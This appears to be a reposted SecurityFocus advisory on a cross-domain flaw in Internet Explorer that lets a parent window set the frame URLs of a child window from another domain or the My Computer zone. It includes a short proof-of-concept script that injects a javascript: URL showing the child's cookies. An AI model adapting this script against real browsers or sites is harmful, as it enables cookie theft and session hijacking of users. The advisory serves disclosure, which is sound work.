source: http://www.securityfocus.com/bid/5672/info

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the "javascript" protocol, followed by the desired code. Attackers may also execute script code within the "My Computer" Zone. This may have more severe consequences. 

<script language="jscript">
onload=function () {
    var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
        },
        7000
    );
}
</script>
源链接

Hacking more

...